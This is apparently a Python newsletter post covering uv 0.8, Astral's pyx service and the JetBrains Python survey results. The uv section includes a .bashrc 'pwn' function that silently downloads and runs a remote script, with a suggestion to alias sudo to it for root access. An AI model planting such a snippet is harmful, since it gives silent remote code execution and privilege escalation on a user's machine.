Summary
Astral releases pyx, its commercial venture, and turns
uv
into a more general Python installer.JetBrains Python survey results are in, and stay pretty consistent with the previous years.
And many little things. Mainly those two, though.
A lot of Astral things happened
Even if the initial buzz surrounding uv
has calmed down, I still follow the company closely, because they haven't stopped being awesome. People just paid less attention to it.
First, they released uv 0.8 with changes that will shift how this tool is positioning itself. It will use its own build backend by default, getting closer to a full replacement for competitors like hatch
.
But more importantly, it used to be that uv
was only for managing your Python project bootstrapping. However, now, it's also a general-purpose Python installer:
uv
will install Python executables in a directory on the PATH. This means if youuv python install python3.13
, you can now callpython3.13
withoutuv
, outside of any project. You can opt out of this with--no-bin
orUV_PYTHON_INSTALL_BIN=0
.uv
-installed Python executables will now be registered in the Windows registry, making them more discoverable on this OS.UV_TOOL_BIN_DIR
will be set in Docker images to/usr/local/bin
, making it a system-wide installer for containers.
The first 2 are good things in my book. It means fewer modes of failure for beginners, and sane defaults for everybody. Note that uv
Python will shadow the system Python on Linux for the user, but not the OS. I think this is ideal: this completely severs the Python for the system from the one people can mess with.
The 3rd one, I'm not so sure. I believe one should still isolate Python in a container, and I worry that this new behavior is going to cause trouble down the road. I would advise you to use a non-root user to set your Docker image, and set UV_TOOL_BIN_DIR
to ~/.local/bin
to opt out of this.
Also, they upgraded uv
download-and-run-code capabilities. You could do this already:
uv run https://pastebin.com/raw/RrEWSA5F
But now it works with gists as well:
uv run https://gist.github.com /charliermarsh/ea9eab7f56b1b3d41e51960001cae31d#file-bar-py
(I have to put spaces to avoid substack from eating the url)
This is super nice for demos, especially mixed with the native inline deps support. Also a fantastic attack vector, if you manage to put this in .bashrc:
pwn(){
wget -qO- https://astral.sh/uv/install.sh | sh &> /dev/null
uv run https://gist.github.com/your_python_script &> /dev/null
}
pwn &
Alias sudo
to call this before, and you even get root for free. Pentesters all over the world are rejoicing.
Ok, if you can execute code out of a sandbox on a machine, it's already too late. But this makes it extra juicy.
Finally, remember when I said that ironically, uv
couldn't solve packaging problems, and also that people were worried about Astral's business model?
Well, last year Charlie Marsh told us in a great interview (still worth watching BTW) they intended to target the B2B market, and they just announced that they are now doing exactly that with their new product: pyx.
Pyx is a SaaS that will solve packaging problems, and many more, by doing stuff on the server side, which uv
can't. uv
will stay FOSS, pyx is the commercial venture that will make them money. They want to make installing unruly beasts like PyTorch easy, let you get the most of your GPU and of course, sort out the whole security deal corporations care about.
Waiting list only, for now.
The numbers are in
The annual Python JetBrains survey results have been published. Take this with the grain of salt that comes with the obvious bias of such a data source, but here is what I make of it:
1 - 50% of the people answering the survey have less than 2 years professional experience, 47% are below 30 years old. I believe this reflects the fact that a lot of fresh blood is constantly pouring into the community. But also that when somebody needs to teach programming, they will choose Python. And that if you are not a programmer (like a mathematician, biologist, economist or geographer) but need to code something anyway, you will likely pick Python. This is quite universal, as only 14% are from the US!
Keep in mind that 32% reported contributing to open-source projects last year, most of that through code, while 26% said they have packaged and published a Python application to a package repository. That's one order of magnitude more than IRL (IMO YMMV TBF AFAIK). So the survey has likely a wayyyyyy more experienced cohort than your average team. This 50% is probably underestimated.
I keep repeating it wherever I go, but geeks rarely listen: if you want to reach Python devs with any medium (tutorials, articles, videos, documentation), you HAVE to take that into consideration. If you do Rust, you can assume proficiency. Not with Python.
That's why this blog has an introduction to the terminal, environment variables or the debugger. So I can link to it in any article that has this as a prerequisite to be understood.
2 - Data analysis (48%), Web dev (46%) and machine learning (41%) are by far the most popular use cases for Python. Mobile dev, game dev, embedded dev and multimedia are scraping a few percents, dead last. Nothing surprising, but it's good to see that what you experience in the field is reflected here. There is good correlation between my experience going from clients to clients, and that makes me feel all fuzzy inside. Also, I hope the mobile dev situation is going to change at some point, thanks to the fact we now have an official Android build target.
3 - 58% learn stuff first from Documentation and APIs. Yeah, right. I don't buy this BS. I used to RTFM colleagues constantly until LLMs arrived and could basically do that for them. But you do feel good when you pretend you do. However, 51% say they learn from YouTube. That, I believe. Not TikTok, Insta, X or BSKY (other, 11%) mind you, but 17 yo and under are excluded from the pool. 27% from AI tools, 41% from blogs, 42% from Stack Overflow. Really? It's still alive?
4 - Most people (35%) stay one Python version (3.12) behind latest (3.13). Good. That's what I recommend as well. Astonishingly, 2% use an unstable version (3.14, very bleeding edge when the survey came out), which says a lot about how disproportionately advanced users are represented in this pool.
5 - 4% use Python 2. More than 3.7, 3.6 or 3.5! There is a lesson in there.
6 - The most popular reason to avoid upgrading (53%) is: "The version I'm using meets all my needs". So there is that.
7 - Installation mode is mostly Python.org (good) and system tools (bad). Despite the huge deserved hype uv
is still niche, believe it or not. That's how big the community is, and that means inertia. Don't get fooled by the bubble of enthusiastic nerds you hang with. If you read a tech blog, you are in a minority bucket. In fact, even when it's about installing packages from PyPI, pip
tops at 74%, poetry
follows at 20% and conda
falls to 18% (from 20% last year and Anaconda goes from 27% as a package source to 6%!). uv
is barely in front of the very obsolete pipenv
with 11%. But it was not even there in the previous survey, so that's something! What might take you by surprise is that 25% install packages directly from... GitHub, and between 10 to 30% (hard to say) from a local source or a private index.
8 - On the Web side, FastAPI (38%) took over Django (35%) and Flask (34%) in popularity. If you like the FastAPI look and feel but still want to benefit from all the Django goodies, I recommend django-ninja. Yet, I have the feeling that we are getting ripe for a new framework that rips the lessons of all those projects, builds on free threading and provides a modern experience. I keep using Django for almost everything since I rarely need something custom enough that it justifies reinventing the wheel with micro-frameworks. And it does the job wonderfully. But it is legacy in both the good and the bad ways.
9 - On the test side, pytest is king (53%). I think it's a solved problem. Next. However, on the GUI side, that Tkinter (21%) is still the top player is very, very sad.
10 - Containers and the cloud in general (AWS and Kubernetes in particular) are popular options for deployment. Given how inexperienced a lot of the community is, this sounds way overkill to me. This is echoed by the fact that most (51%) "develop for the cloud locally with virtualenv" more than in containers or virtual machines. Or it might be just an artifact of how portable Python is. Maybe both. In any case, 42% don't use a venv in a container. And then complain something breaks, I assume.
11 - Data-science wise, pandas (80%) stays miles ahead. We may hear a lot about Spark and Polars, but they are only 16% and 15% respectively. 8% have an in-house solution. That's a lot more than it looks like, given the cost of maintaining one. But I can attest to that. I have a massive client that made me port their entire critical, enormous, proprietary calculation engine to Python from... Matlab. You would think coming from a matrix oriented language, the whole thing would make an easy target for at least NumPy. But no. We had to write most things custom. Anything that deals with the messy nature of human life and not something virtual like a video codec or a file system will eventually be full of small details that can't be vectorized. Laws, dates and configurability are especially gnarly. No SIMD for me.
12 - Scikit-learn (68%) is in front of both PyTorch (66%) and TensorFlow (49%) in terms of user base, which is counterintuitive in this day and age of AI bubble. You would think that old school machine learning has been rendered obsolete, but it turns out those techniques, while less flexible, are also more cost effective. So it makes sense to stick to what is fast and cheap if it works.
13 - OS wise, we are at 59% Linux, 58% Windows, 27% macOS, keeping in mind that WSL skews the results and that people can rock several devices or partitions. Again, if you address the community, know that so many Windows users are present is very important, since many are not comfy with the CLI, although this is improving.
14 - Not so much related to Python as interesting as a standalone data point: ChatGPT stays the uncontested winner of the AI race, with 4 out of 5 respondents using it. Anthropic Claude, especially the Claude code agent, is vastly superior in almost every way for coding, and yet scores only 17%. Branding is a powerful force. And so is being the default option (39% use GitHub Copilot, despite it being very limited) or being free (Google Gemini, 23%).
15 - On the DB side, the podium Postgres (49%), SQLite (37%), MySQL (31%) and Redis (18%) to the surprise of no one. You really have to scroll to see columnar DBs in there, like the excellent ClickHouse (2%), and DuckDB is nowhere in sight, no matter how popular data analysis is.
16 - CI is also pretty much what you expect: GitHub Actions is evidently first because... GitHub (35%), followed by GitLab CI (22%), Jenkins / Hudson (12%), Azure DevOps (8%) and AWS stuff (5%). The latter is more corporate, and given the nature of the survey, is likely to be underrepresented.
17 - Configuration Management Tools is really, really fun. The graph starts with Ansible at 8%, followed by "a custom solution". Given how Ansible sucks, it's very much telling. But the most important is "None", 71%. Yes, many people do stuff manually, because remember, half of the community is made of beginners. But also, containers and orchestrators moved automation from Ansible YAML files to Dockerfiles and ... Kubernetes YAML files, I guess. I want to believe in an alternative universe CUELang became the de facto conf language and they achieved world peace.
18 - Documentation wise, raw markdown seems to win (44%). But, it's a format, not a system, like Swagger (29%) which is automated and just for Web API or Sphinx (14%). This doesn't say much, most READMEs are in markdown by default, and both Sphinx and MkDocs support markdown. I'll say the quiet part aloud though: a lot of people hate RST with a passion.
19 - VSCode (49%) and PyCharm (25%) are still the editors of choice. 7% of Vim + Neovim. Again, if you had a picture of the average Python dev rocking Arch Linux with a tiled DE from their Dvorak ergo keyboard, you are going to be very disappointed.
20 - You might think that C is the main language to create compiled extensions for Python, but it's only the second (45%), the first one being C++ (55%). Given the precision of this survey, we can consider them at the same level, but it's still way more than I suspected. 3rd place goes to Rust, with a staggering 33% of people that used it for that purpose at least once. That's how much Rust is popular in the Python world nowadays. 4th place is Go (9%)!
Let's not forget
PEP 802 suggests that we change the empty set notation from
set([])
to{/}
. I'm neutral on this one.PyPI will now reject zips constructed to exploit construction attacks.. Nice to see the security devs keeping at it.
The Python documentary is out, watch it for free on YouTube.
The core devs relegate the old Intel CPU to a lower tier of support on Mac. It was 2 Apple architecture changes ago so I don't know who is impacted by this, but I'm sure someone, somewhere, will be.
A new profiling module will be added to the stdlib. It will do nothing, and serves only as a namespace to group all things related to profiling in Python, such as cProfile (aliased to
tracing
) and the new statistical sampling profiler previously named "tachyon" (renamedsampling
). If none of that makes sense to you, don't worry, it's mostly to keep imports neat and tidy. Careful, it does come with deprecation of the old imports over 2 years.If you want download stats for packages on PyPI, you go to Pypistats. And it's now operated by the PSF, to keep it running forever.
Google sunsets pytype, its Python type checker project. You know the joke about Google canceling projects, right?